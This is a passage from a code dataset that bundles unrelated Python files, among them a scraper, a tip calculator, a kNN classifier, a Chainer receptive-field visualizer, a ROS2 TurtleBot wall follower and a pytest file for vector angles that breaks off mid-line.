csv\n# import requests\n# from bs4 import BeautifulSoup\n\n\n# def scrape_data(url):\n\n# response = requests.get(url, timeout=10)\n# soup = BeautifulSoup(response.content, 'html.parser')\n\n# table = soup.find_all('table')[1]\n\n# rows = table.select('tbody > tr')\n\n# header = [th.text.rstrip() for th in rows[0].find_all('th')]\n\n# with open('output.csv', 'w') as csv_file:\n# writer = csv.writer(csv_file)\n# writer.writerow(header)\n# for row in rows[1:]:\n# data = [th.text.rstrip() for th in row.find_all('td')]\n# print(data)\n# #writer.writerow(data)\n\n\n# # if __name__==\"__main__\":\n# url = \"https://en.wikipedia.org/wiki/List_of_countries_and_dependencies_by_population\"\n# scrape_data(url)\n\n","sub_path":"scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"611125560","text":"import os\nfrom pathlib import Path\nfrom collections import namedtuple\n\nDirectory = namedtuple('Directory', ['owners', 'dependencies'])\n\nOWNERS = '/OWNERS'\nDEPENDENCIES = '/DEPENDENCIES'\nDEBUG = True\n\ndef check_directory(directory):\n if DEBUG:\n print('checking {}'.format(directory))\n owners_file = Path(directory + OWNERS)\n dependency_file = Path(directory + DEPENDENCIES)\n owners_data = read_file(owners_file) if owners_file.exists() else None\n dependency_data = read_file(dependency_file) if dependency_file.exists() else None\n return Directory(owners=owners_data, dependencies=dependency_data)\n\n\ndef read_file(file_path):\n with open(file_path, 'r') as data:\n return [line.strip() for line in data.readlines()]\n\ndef main():\n ROOT = os.getcwd() + '/src'\n print(check_directory(ROOT))\n print(check_directory(ROOT + '/backend'))\n\nmain()","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454006873","text":"print(\"Welcome to the tip calculator!\")\nbill_amount = float(input(\"what's the total bill amount? Rs. \"))\ntip = int(input(\"what's tip amount you like to give? 10, 12, 15? \"))\nperson = int(input(\"how many people's are sharing the bill? \"))\n\ntip_percentage = tip / 100\ntotal_amount = bill_amount * tip_percentage\ntotal_bill = bill_amount + total_amount\neach_share = total_bill / person\namount = round(each_share)\n\nprint(f\" each person share is: Rs{amount} \")\n","sub_path":"code_2_0.py","file_name":"code_2_0.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"635450827","text":"from Algorithms.Optimizer import Optimizer\nfrom Utils.Matrix import add_ones_column\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression:\n def __init__(self, optimizer: Optimizer, xs, ys):\n self.xs = xs\n self.ys = ys\n self.optimizer = optimizer\n self.cost_fn = cost_fn\n self.thetas = None\n self.j_values = None\n\n def run(self, steps, alpha) -> (np.ndarray, np.ndarray):\n self.thetas, self.j_values = self.optimizer.run(steps, alpha, self.xs, self.ys)\n return self.thetas, self.j_values\n\n def plot(self):\n plt.subplot(2, 1, 1)\n plt.plot(self.j_values)\n plt.subplot(2, 1, 2)\n plt.plot(self.xs, self.ys, 'ro')\n plt.plot(self.xs, self.optimizer.h(add_ones_column(self.xs), self.thetas))\n plt.show()\n\n def describe(self):\n pass\n\n def predict(self, xs: np.ndarray):\n xs = add_ones_column(xs)\n return self.optimizer.h(xs, self.thetas)\n\n\ndef cost_fn(xs, ys, thetas):\n square = np.vectorize(np.square)\n m = np.size(xs, 1)\n b = sum(square((xs @ thetas.T) - ys))\n return (1 / (2 * m)) * b\n","sub_path":"Regression/LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"321960742","text":"import pyblish.api\n\n\nclass CollectExample(pyblish.api.InstancePlugin):\n \"\"\"Collect something for example valitation\n\n ```\n instance.data {\n example: my example\n }\n ```\n\n \"\"\"\n\n label = \"Collect Example\"\n families = [\"config.example\"]\n order = pyblish.api.CollectorOrder + 0.1\n hosts = [\"maya\"]\n\n def process(self, instance):\n instance.data.update(\n {\n \"example\": self._collect_example(instance)\n }\n )\n\n @staticmethod\n def _collect_example(instance):\n from maya import cmds\n return cmds.ls(\"example\")\n","sub_path":"plugins/maya/tasks/__example__/publish/example_collector.py","file_name":"example_collector.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"280010338","text":"from __future__ import print_function\r\nimport torch.utils.data as data\r\nfrom PIL import Image\r\nimport os\r\nimport os.path\r\nimport errno\r\nimport numpy as np\r\nimport torch\r\nimport codecs\r\nimport random\r\nfrom path import Path\r\nfrom scipy.misc import imread, imresize\r\nimport scipy.io as sio\r\n\r\n\r\nclass Handseg_RHD(data.Dataset):\r\n \"\"\"`Ox `_ Dataset.\r\n\r\n Args:\r\n root (string): Root directory of dataset\r\n train (bool, optional): If True, creates dataset from ``training.pt``,\r\n otherwise from ``test.pt``.\r\n download (bool, optional): If true, downloads the dataset from the internet and\r\n puts it in root directory. If dataset is already downloaded, it is not\r\n downloaded again.\r\n transform (callable, optional): A function/transform that takes in an PIL image\r\n and returns a transformed version. E.g, ``transforms.RandomCrop``\r\n target_transform (callable, optional): A function/transform that takes in the\r\n target and transforms it.\r\n \"\"\"\r\n training_file = 'training/'\r\n test_file = 'evaluation/'\r\n \r\n def __init__(self, root, train=True, transform=None, target_transform=None, download=False, vis=False):\r\n self.root = os.path.expanduser(root)\r\n self.transform = transform\r\n self.target_transform = target_transform\r\n self.train = train # training set or test set\r\n self.vis = vis\r\n if self.train:\r\n self.train_root = (Path(self.root) / self.training_file / 'color')\r\n self.train_samples = self.collect_samples(self.train_root, self.training_file)\r\n else:\r\n self.test_root = (Path(self.root) / self.test_file / 'color')\r\n self.test_samples = self.collect_samples(self.test_root, self.test_file)\r\n \r\n def collect_samples(self, root, file):\r\n samples = []\r\n for img in sorted((root).glob('*.png')):\r\n _img = img.basename().split('.')[0]\r\n label = (Path(self.root) / file / 'hand_mask' / _img + '.png')\r\n if self.train:\r\n assert label.exists()\r\n sample = {'img': img, 'label': label}\r\n samples.append(sample)\r\n return samples\r\n \r\n def load_samples(self, s):\r\n image = imread(s['img'], mode='RGB')\r\n try:\r\n label = imread(s['label'], mode='L')\r\n except:\r\n label = image\r\n return [image, label]\r\n\r\n def __getitem__(self, index):\r\n \"\"\"\r\n Args:\r\n index (int): Index\r\n\r\n Returns:\r\n tuple: (image, target) where target is index of the target class.\r\n \"\"\"\r\n \r\n if self.train:\r\n s = self.train_samples[index]\r\n else:\r\n s = self.test_samples[index]\r\n image, target = self.load_samples(s)\r\n # doing this so that it is consistent with all other datasets\r\n # to return a PIL Image\r\n img = Image.fromarray(np.array(image), mode='RGB')\r\n # target = Image.fromarray(np.array(image))\r\n h, w = img.size[0], img.size[1]\r\n if self.transform is not None:\r\n img = self.transform(img)\r\n if self.target_transform is not None:\r\n target = self.target_transform(target)\r\n \r\n target = imresize(target, (256, 256))\r\n \r\n hand_mask = (target / 255).astype('uint8')\r\n bg_mask = np.logical_not((target/255).astype('uint8')).astype('uint8')\r\n target = np.stack((bg_mask, hand_mask), axis=2)\r\n if self.vis:\r\n return img, target.astype('float'), image\r\n return img, target.astype('float')\r\n \r\n def __len__(self):\r\n if self.train:\r\n return len(self.train_samples)\r\n else:\r\n return len(self.test_samples)\r\n \r\n def __repr__(self):\r\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\r\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\r\n tmp = 'train' if self.train is True else 'test'\r\n fmt_str += ' Split: {}\\n'.format(tmp)\r\n fmt_str += ' Root Location: {}\\n'.format(self.root)\r\n tmp = ' Transforms (if any): '\r\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\r\n tmp = ' Target Transforms (if any): '\r\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\r\n return fmt_str\r\n\r\n\r\ndef visual_box(data, output, i):\r\n import cv2\r\n import scipy\r\n img = Image.fromarray(np.array(data).squeeze(), mode='RGB')\r\n h, w = img.size[0], img.size[1]\r\n output = np.array(output).squeeze()\r\n output[::2] = output[::2] * w\r\n output[1::2] = output[1::2] * h\r\n img = cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR)\r\n for j in range(0, 8, 2):\r\n cv2.circle(img, (int(output[j + 1]), int(output[j])), 5, (255, 255, 0), -1)\r\n # box format (w1, h1, w2, h2, ...)\r\n cv2.imwrite('/Data/hand_dataset_ox/vis/{:05d}.jpg'.format(i), img)\r\n print('img saving to \\'/Data/hand_dataset_ox/vis/{:05d}.jpg\\''.format(i))\r\n\r\ndef process_hand_mask():\r\n import cv2\r\n from collections import Counter\r\n root = Path('/Data/RHD_v1-1/RHD_published_v2')\r\n file = 'evaluation'\r\n masks = sorted((root / file / 'mask').glob('*.png'))\r\n hand_mask_dir = root / file / 'hand_mask'\r\n hand_mask_dir.mkdir_p()\r\n print('total mask png {}'.format(len(masks)))\r\n for i in range(len(masks)):\r\n print('processing {}/{}'.format(i, len(masks)))\r\n mask = cv2.imread(masks[i],cv2.IMREAD_GRAYSCALE)\r\n mask_hand = mask > 1 # True for hand, False for bg\r\n mask_hand = mask_hand.astype('uint8') * 255\r\n cv2.imwrite(hand_mask_dir / masks[i].basename(), mask_hand)\r\n print(1)\r\n \r\ndef visual_mask(image, output, target, i ):\r\n import cv2\r\n save_root = Path('./visual_mask')\r\n print('saving to {}/{:05d}'.format(save_root, i))\r\n target = torch.argmax(target, dim=3).squeeze() * 255\r\n\r\n output = torch.argmax(output.permute([0,2,3,1]), dim=3).squeeze() * 255\r\n # output =\r\n # cv2.imwrite(save_root / '{:05}_mask_hand.png'.format(i), (np.array(target.squeeze()[:,:,1])*255).astype('uint8'))\r\n # cv2.imwrite(save_root / '{:05}_mask_hand.png'.format(i), (np.array(target.squeeze()[:, :, 0])*255).astype('uint8'))\r\n output = np.array(output).astype('uint8')\r\n target = np.array(target).astype('uint8')\r\n image = np.array(image).squeeze().astype('uint8')\r\n cv2.imwrite(save_root / '{:05}.png'.format(i), cv2.cvtColor(image,cv2.COLOR_RGB2BGR))\r\n cv2.imwrite(save_root / '{:05}_pre.png'.format(i), output)\r\n cv2.imwrite(save_root / '{:05}_mask.png'.format(i), target)\r\n\r\nif __name__ == '__main__':\r\n process_hand_mask()\r\n # import shutil\r\n #\r\n # data = Path('/Data/RHD_v1-1/RHD_published_v2/evaluation/')\r\n # imgs = data.glob(\"*.png\")\r\n # imgs.sort()\r\n #\r\n # for i in range(len(imgs)):\r\n # shutil.copyfile(imgs[i], data/'color'/\"real_{:05d}.png\".format(i))","sub_path":"data_loader/hand_seg_RHD.py","file_name":"hand_seg_RHD.py","file_ext":"py","file_size_in_byte":7168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"25122436","text":"from django.urls import include, path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom . import views\n\napp_name = 'dal'\nurlpatterns = [\n path('prefix/', views.prefix, name='prefix'),\n path('obs/', views.obstype, name='obstype'),\n path('proc/', views.proctype, name='proctype'),\n path('prod/', views.prodtype, name='prodtype'),\n path('rawreq/', views.rawreq, name='rawreq'),\n path('fnreq/', views.filenamereq, name='filenamereq'),\n path('ingestreq/', views.ingestreq, name='ingestreq'),\n path('ingestrec/', views.ingestrec, name='ingestrec'),\n path('supportreq/', views.supportreq, name='supportreq'),\n path('floatreq/', views.floatreq, name='floatreq'),\n path('hdrfuncs/', views.hdrfuncs, name='hdrfuncs'),\n path('errcodes/', views.errcodes, name='errcodes'),\n]\n","sub_path":"marssite/tada/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"637923860","text":"import pandas as pd\nimport numpy as np\nfrom abstract_classifier import AbstractClassifier\nfrom learning_lib import distance_metric\n\n\nclass KNNClassifier(AbstractClassifier):\n def fit(self, X_train, y_train):\n # There is no \"training\" step in kNN\n self.X_train = X_train\n self.y_train = y_train\n\n def predict(self, X_test):\n predictions = []\n for _, instance in X_test.iterrows():\n predictions.append(self.k_nearest_neighbor(instance, k=3))\n return np.array(predictions)\n\n def k_nearest_neighbor(self, target, k=1):\n # Build an indexed distance map\n indexes = {}\n for i, instance in self.X_train.iterrows():\n indexes[i] = distance_metric(instance, target)\n # Sort the map by distance (ascending) and take the shortest k instances\n k_nearest_dists = sorted(indexes.items(), key=lambda kv: kv[1])[:k]\n # Throw away the distances leaving the indexes\n k_nearest_indexes = list(map(lambda d: d[0], k_nearest_dists))\n # Collect the training classes associated with the predicted indexes\n counts = np.bincount(np.array(self.y_train[k_nearest_indexes]))\n # Return the most frequently occurring class as the winning predicted class\n return np.argmax(counts)\n","sub_path":"04-knn/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"183520007","text":"\n'''\n 受容野の可視化を行う\n class VisNetwork\n'''\n\nimport math\nimport heapq\nfrom chainer import function_node\nfrom chainer import variable\n\n\n\n\ndef add_element(dic, key, val):\n if key in dic:\n dic[key].append(val)\n else:\n dic[key] = [val]\n return dic\n\n# https://medium.com/mlreview/a-guide-to-receptive-field-arithmetic-for-convolutional-neural-networks-e0f514068807\ndef outFromIn(conv, layerIn, cover_all=False):\n n_in = layerIn[0]\n j_in = layerIn[1]\n r_in = layerIn[2]\n start_in = layerIn[3]\n k = conv[0]\n s = conv[1]\n p = conv[2]\n if cover_all:\n n_out = math.floor((n_in - k + 2*p + s-1)/s) + 1\n else:\n n_out = math.floor((n_in - k + 2*p)/s) + 1\n actualP = (n_out-1)*s - n_in + k \n pR = math.ceil(actualP/2)\n pL = math.floor(actualP/2)\n\n j_out = j_in * s\n r_out = r_in + (k - 1)*j_in\n start_out = start_in + ((k-1)/2 - pL)*j_in\n #start_out = start_in + ((k-1)/2 - p)*j_in\n return n_out, j_out, r_out, start_out\n\nclass FunctionCell:\n def __init__(self, edge_list):\n self.function = None\n self.inputs = []\n self.outputs = []\n \n self.n_required_var = 0\n self.required_var_cnt = 0\n self.input_vars = []\n self.output = None\n for index, edge in edge_list:\n if index == 0:\n self.function = edge[index]\n self.outputs.append(edge[1])\n elif index == 1:\n self.function = edge[index]\n self.inputs.append(edge[0])\n \n self._set_require_var()\n \n # define function information\n if 'Pooling' in self.function.label:\n info = [self.function.kw, self.function.sx, self.function.pw]\n self.cover_all = self.function.cover_all\n elif 'Convolution' in self.function.label:\n W = self.function.inputs[1]\n info = [W.shape[-1], self.function.sx, self.function.pw]\n self.cover_all = self.function.cover_all\n else:\n info = None\n self.cover_all = None\n self.info =info\n\n def _set_require_var(self):\n if '_ + _' in self.function.label:\n self.n_required_var = 2\n else:\n self.n_required_var = 1\n\n def _reset_cnt(self):\n self.required_var_cnt = 0\n \n def _reset(self):\n self._reset_cnt()\n self.input_vars = []\n self.output = None\n \n def receptive_field(self):\n if len(self.input_vars) == 0:\n raise TypeError('inputs_vars should be not empty list. Please assign value')\n \n if self.info is None:\n if self.n_required_var > 1:\n # Add function_node\n max_var = (-1, -1, -1, -1)\n for var in self.input_vars:\n if max_var[2] < var[2]:\n max_var = var\n return max_var\n else:\n # otherwise return input of index 0\n return self.input_vars[0]\n elif self.n_required_var == 1:\n # Convolution, Pooling\n return outFromIn(self.info, self.input_vars[0], cover_all=self.cover_all)\n\n\nclass VisNetwork:\n def __init__(self, f_cells, input_nodes):\n self.input_nodes = input_nodes\n self.function_edges = []\n for cell_i in f_cells:\n for out in cell_i.outputs:\n for cell_j in f_cells:\n if out in cell_j.inputs:\n self.function_edges.append((cell_i, cell_j))\n cell_i._reset_cnt()\n cell_j._reset_cnt()\n self.first_functions = []\n for in_node in self.input_nodes:\n for edge in self.function_edges:\n if in_node in edge[0].inputs:\n self.first_functions.append({'edge':edge, 'input':in_node})\n self.last_cell = None\n \n def _reset(self):\n for cell_i, cell_j in self.function_edges:\n cell_i._reset()\n cell_j._reset()\n \n def __call__(self, x, mode='constrcut'):\n if mode == 'construct':\n return self.constract(x)\n elif mode == 'receptive' or mode == 'rf':\n return self.get_receptive_field(x)\n \n def constract(self):\n self._reset()\n def _rec_fw(current_edge, x):\n break_flag = True\n next_edges = []\n y = x+'->'+current_edge[0].function.label\n for edge in self.function_edges:\n if current_edge[1] == edge[0]:\n break_flag = False\n next_edges.append(edge) \n \n current_edge[1].input_vars.append(y)\n current_edge[1].required_var_cnt += 1\n\n if current_edge[1].required_var_cnt < current_edge[1].n_required_var:\n break_flag = True\n\n if break_flag:\n if len(next_edges) == 0:\n self.last_cell = current_edge\n return 'end:' + y+'->'+current_edge[1].function.label\n return None\n ress = []\n for next_edge in next_edges:\n res = _rec_fw(next_edge, y)\n if res is not None and len(res) >0:\n ress.append(res)\n ress = np.asarray(ress)\n ress = np.squeeze(ress)\n if ress is None:\n ress = None\n else:\n ress = np.delete(ress, np.where(ress == None)[0])\n ress = ress.tolist() \n return ress\n \n for f_edge in self.first_functions:\n res = _rec_fw(f_edge['edge'], 'input')\n print(res)\n\n def calc_receptive_field(self):\n self._reset()\n def _rec_fw(current_edge):\n break_flag = True\n next_edges = []\n # calc receptive field\n y = current_edge[0].receptive_field()\n current_edge[0].output = y\n for edge in self.function_edges:\n if current_edge[1] == edge[0]:\n break_flag = False\n next_edges.append(edge) \n \n current_edge[1].input_vars.append(y)\n current_edge[1].required_var_cnt += 1\n if current_edge[1].required_var_cnt < current_edge[1].n_required_var:\n break_flag = True\n if break_flag:\n if len(next_edges) == 0:\n self.last_cell = current_edge[1]\n current_edge[1].output = current_edge[1].receptive_field()\n return None\n return None\n \n for next_edge in next_edges:\n _rec_fw(next_edge)\n \n layer_infos = []\n for f_edge in self.first_functions:\n imsize = f_edge['input'].data.shape[2:][0]\n layerInfo = (imsize, 1, 1, 0.5)\n f_edge['edge'][0].input_vars.append(layerInfo)\n res = _rec_fw(f_edge['edge'])\n if res is not None:\n layer_infos.append(res)\n \n self.layer_infos = layer_infos\n\n def get_receptive_field(self, neuron_index):\n if self.last_cell is None:\n self.calc_receptive_field()\n layer_info = self.last_cell.output\n n, j, rf, start = layer_info\n if isinstance(neuron_index, tuple):\n center_y = start + (neuron_index[1])*j\n center_x = start + (neuron_index[0])*j\n else:\n center_y = start + (neuron_index//n)*j\n center_x = start + (neuron_index%n)*j\n return (center_x, center_y) , (rf/2, rf/2)\n\ndef get_rf_visualizer(input_var, feature_map):\n cands = []\n seen_edges = set()\n nodes = set()\n push_count = [0]\n \n def add_cand(cand):\n heapq.heappush(cands, (-cand.rank, push_count[0], cand))\n push_count[0] += 1\n\n if isinstance(feature_map, list):\n outputs = feature_map\n else:\n outputs = [feature_map]\n\n for o in outputs:\n if isinstance(o, variable.Variable):\n o = o.node\n add_cand(o)\n nodes.add(o)\n\n while cands:\n _, _, cand = heapq.heappop(cands)\n if isinstance(cand, variable.VariableNode):\n creator = cand.creator_node\n if creator is not None and (creator, cand) not in seen_edges:\n add_cand(creator)\n seen_edges.add((creator, cand))\n nodes.add(creator)\n nodes.add(cand)\n elif isinstance(cand, function_node.FunctionNode):\n for input_ in cand.inputs:\n if input_ is not cand and (input_, cand) not in seen_edges:\n add_cand(input_)\n seen_edges.add((input_, cand))\n nodes.add(input_)\n nodes.add(cand)\n \n function_node_dict = {}\n for edge in seen_edges:\n if isinstance(edge[0], function_node.FunctionNode):\n function_node_dict = add_element(function_node_dict, hex(id(edge[0])), (0, edge))\n elif isinstance(edge[1], function_node.FunctionNode):\n function_node_dict = add_element(function_node_dict, hex(id(edge[1])), (1, edge))\n\n f_cells = []\n for key in function_node_dict:\n f_cells.append(FunctionCell(function_node_dict[key]))\n\n return VisNetwork(f_cells, [input_var._node])\n","sub_path":"src/receptive_visualizer.py","file_name":"receptive_visualizer.py","file_ext":"py","file_size_in_byte":9416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"228271583","text":"import rclpy\nimport numpy as np\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom std_msgs.msg import Float32MultiArray\nfrom geometry_msgs.msg import Twist\nfrom automate_turtlebot3_pkg.tf_utils import TFUtils\n\nclass WallFollower(Node):\n def __init__(self, node_name: str = 'automate_turtlebot', **kwargs: dict):\n super(WallFollower, self).__init__(node_name=node_name, **kwargs)\n qos = QoSProfile(depth=1)\n\n # sensor variable\n self.distance_array = np.zeros(3)\n\n # state variable\n self.current_yaw = 0.\n\n # logic variable\n self.target_yaw = 0.\n self.current_state = 'start'\n self.turn_deg = 87.\n\n # Declaring cmd_vel to publish Twist\n self.control_publisher = self.create_publisher(Twist, \"/cmd_vel\", qos)\n\n # initialize subscription\n self.create_subscription(Float32MultiArray, '/min_dis', self.sensor_subscribe_callback, qos)\n\n # initialize timer function for control\n self._control_period = 0.1\n self.create_timer(self._control_period, self.control_timer_callback)\n\n # initialize timer function for state acquisition\n self._state_period = 0.1\n self.tf_utils = TFUtils(self, False)\n self.create_timer(self._state_period, self.state_timer_callback)\n\n def sensor_subscribe_callback(self, msg: Float32MultiArray):\n \"\"\"read sensor data and update self.distance_array\"\"\"\n self.distance_array = msg.data\n\n def state_timer_callback(self, ):\n \"\"\" read tf and update current yaw\"\"\"\n transform = self.tf_utils.lookup_transform(\n target_frame='base_link',\n source_frame='odom',\n convert=False,\n when=None)\n self.current_yaw = self.euler_from_quaternion(\n transform.transform.rotation)[2]\n\n \n def create_turnright_msg(self) -> Twist:\n turn_right = Twist()\n turn_right.linear.x = 0.0\n turn_right.linear.y = 0.0\n turn_right.linear.z = 0.0\n turn_right.angular.x = 0.0\n turn_right.angular.y = 0.0\n turn_right.angular.z = -0.1\n return turn_right\n\n def create_turnleft_msg(self) -> Twist:\n turn_left = Twist()\n turn_left.linear.x = 0.0\n turn_left.linear.y = 0.0\n turn_left.linear.z = 0.0\n turn_left.angular.x = 0.0\n turn_left.angular.y = 0.0\n turn_left.angular.z = 0.1\n return turn_left\n\n def create_forward_msg(self) -> Twist:\n fwd_msg = Twist()\n fwd_msg.linear.x = 0.2\n fwd_msg.linear.y = 0.0\n fwd_msg.linear.z = 0.0\n fwd_msg.angular.x = 0.0\n fwd_msg.angular.y = 0.0\n fwd_msg.angular.z = 0.0\n return fwd_msg\n\n def create_stop_msg(self) -> Twist:\n stop_drive = Twist()\n stop_drive.linear.x = 0.0\n stop_drive.linear.y = 0.0\n stop_drive.linear.z = 0.0\n stop_drive.angular.x = 0.0\n stop_drive.angular.y = 0.0\n stop_drive.angular.z = 0.0\n return stop_drive \n\n\n def euler_from_quaternion(self, quat):\n \"\"\"\n Convert quaternion (w in last place) to euler roll, pitch, yaw.\n quat = [x, y, z, w]\n \"\"\"\n x = quat.x\n y = quat.y\n z = quat.z\n w = quat.w\n sinr_cosp = 2 * (w * x + y * z)\n cosr_cosp = 1 - 2 * (x * x + y * y)\n roll = np.arctan2(sinr_cosp, cosr_cosp)\n sinp = 2 * (w * y - z * x)\n pitch = np.arcsin(sinp)\n siny_cosp = 2 * (w * z + x * y)\n cosy_cosp = 1 - 2 * (y * y + z * z)\n yaw = np.arctan2(siny_cosp, cosy_cosp)\n return roll, pitch, yaw\n\n\n def control_timer_callback(self,):\n \"\"\"logic\"\"\"\n print(self.current_state,\"1\")\n\n # 1. start forward, init\n if self.current_state == 'start':\n print(self.current_state)\n self.current_yaw = 0.\n\n self.current_state = 'forward'\n print(self.current_state, \"1\")\n\n # 2. Conditions for driving forward \n elif self.current_state == 'forward':\n if self.distance_array[0] > 0.5:\n self.target_yaw = self.current_yaw + np.deg2rad(self.turn_deg)\n self.control_publisher.publish(self.create_forward_msg())\n print( self.current_state,\"2\",\"\\nFront sensor: \", self.distance_array[0],\"[m], \\n\\nCurrent_yaw: \", np.rad2deg(self.current_yaw), \"\\n\", \"Target yaw: \", np.rad2deg(self.target_yaw), \"\\n\\n\")\n else:\n self.current_state = 'turn_right'\n\n # 3. condition for turning right\n elif self.current_state == 'turn_right':\n if self.target_yaw > np.deg2rad(180):\n self.target_yaw = self.target_yaw - np.deg2rad(360)\n self.control_publisher.publish(self.create_turnright_msg())\n print( self.current_state,\"3\",\"\\nFront sensor: \", self.distance_array[0],\"[m], \\n\\nCurrent_yaw: \", np.rad2deg(self.current_yaw), \"\\n\", \"Target yaw: \", np.rad2deg(self.target_yaw), \"\\n\\n\")\n if self.current_yaw >= self.target_yaw:\n self.current_state = 'forward'\n\n\ndef main():\n rclpy.init()\n node = WallFollower()\n rclpy.spin(node)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/automate_turtlebot3_pkg/automate_turtlebot3_pkg/Wall_Follower_v2.py","file_name":"Wall_Follower_v2.py","file_ext":"py","file_size_in_byte":5253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"396554313","text":"import os\nimport random\ndef count_entries(d):\n m = {key:len(d[key]) for key in d}\n return m\n\ndef db_assignment_problem_solver(base_path = 'D:/Data/data_short/dev-clean'):\n speaker_id_list = os.listdir(base_path)\n files_dict = {}\n for id in speaker_id_list:\n tmp_path = base_path + '/' + id\n folder_list = os.listdir(tmp_path)\n concat_file = []\n for folder in folder_list:\n temporary_tmp_path = tmp_path + '/' + folder\n file_list = os.listdir(temporary_tmp_path)\n file_list = [temporary_tmp_path + '/' + x for x in file_list if 'flac' in x]\n concat_file += file_list\n files_dict[int(id)] = concat_file\n speaker_id_list = [int(x) for x in speaker_id_list]\n\n total_count = sum([len(files_dict[key]) for key in files_dict])\n pairs = []\n for first_id in files_dict:\n shrinked_list = speaker_id_list[:]\n shrinked_list.remove(first_id)\n for f in files_dict[first_id]:\n choose_bool = False\n counter = count_entries(files_dict)\n while not choose_bool:\n sec_id = random.choice(shrinked_list)\n if counter[sec_id]>0:\n choose_bool = True\n f1,f2 = f,random.choice(files_dict[sec_id])\n files_dict[sec_id].remove(f2)\n files_dict[first_id].remove(f1)\n pairs.append([f1,f2])\n return pairs\n\n","sub_path":"project/src/training/handle_folder.py","file_name":"handle_folder.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50434442","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 11 19:58:01 2020\n\n@author: davideferri\n\"\"\"\n\nimport pandas as pd \nimport numpy as np \nimport scipy.stats as ss\nimport pymc3 as pm \nimport arviz as az\nimport logging\n\n# ---------------------- generate drows from population ---------------------------- #\n\n# set the random seed \nnp.random.seed(123)\n# set the true value of the parameters\nmue_true = 1 ; sigma_true = 50\n# set the number of draws \ndraws = 1000\n# get the draws from the population \ndata = ss.norm.rvs(loc= mue_true, scale= sigma_true, size = draws)\nlog.info(\"the data is drawn is as follows: %s\", data)\n# plot the Kernel density estimation of the data\naz.plot_kde(data)\n\n# ------------------------ specify the probabilistic model --------------------------- # \n\nwith pm.Model() as gaussian_model:\n # set the priors for the parameters\n mu = pm.Uniform(\"mu\",-10,10)\n sigma = pm.HalfNormal(\"sigma\",10)\n # get the likelihood\n y = pm.Normal(\"obs\", mu = mu, sigma = sigma, observed = data)\n # inference step \n trace = pm.sample(1000)\n \n# ----------------------- analyse the posterior --------------------------------------- #\n \nwith gaussian_model:\n # show the trace\n log.info(\"The trace of mu is %s:\", trace[\"mu\"]), log.info(\"the shape is %s\", trace[\"mu\"].shape)\n log.info(\"The trace of sigma is %s:\", trace[\"sigma\"]), log.info(\"the shape is %s\", trace[\"sigma\"].shape)\n # show the trace summary\n az.summary(trace)\n # plot the trace KDE and MCMC draws\n az.plot_trace(trace)\n # plot the trace joint KDE \n az.plot_joint(trace, kind=\"kde\", fill_last = False)\n \n# ------------------------ get samples of the data from the posterior ----------------- # \n \nwith gaussian_model:\n # get the samples of the data\n y_new = pm.sample_posterior_predictive(trace)\n log.info(\"The samples from the data is: %s\", y_new[\"obs\"])\n log.info(\"The shape of the samples is: %s\", y_new[\"obs\"].shape)\n # visual check for whether the original sample makes sense given the posterior\n data_ppc = az.from_pymc3(trace=trace,posterior_predictive=y_new)\n ax = az.plot_ppc(data_ppc,figsize=(12,6),mean=False)\n ax[0].legend(fontsize=15)\n ","sub_path":"Gaussian_example.py","file_name":"Gaussian_example.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120110247","text":"#!/usr/bin/env python3\n\nimport pytest\nimport math\nimport numpy as np\nimport _vector\n\ndef angle(vec1, vec2):\n dot_product = np.dot(vec1, vec2)\n len1 = np.dot(vec1, vec1)\n len2 = np.dot(vec2, vec2)\n return np.arccos(dot_product / (np.sqrt(len1 * len2)))\n\ndef testInvalidVector():\n with pytest.raises(TypeError):\n _vector.angle([0, 0], [])\n with pytest.raises(TypeError):\n _vector.angle([], [0, 0])\n with pytest.raises(TypeError):\n _vector.angle([], [])\n with pytest.raises(TypeError):\n _vector.angle([\"1\", 2], [1, 1])\n\n# Test for zero-length 2-vector (invalid input).\ndef testZeroLengthVector():\n with pytest.raises(ValueError):\n _vector.angle([1, 1], [0, 0])\n with pytest.raises(ValueError):\n _vector.angle([0, 0], [1, 1])\n with pytest.raises(ValueError):\n _vector.angle([0, 0], [0, 0])\n\n# Test for zero 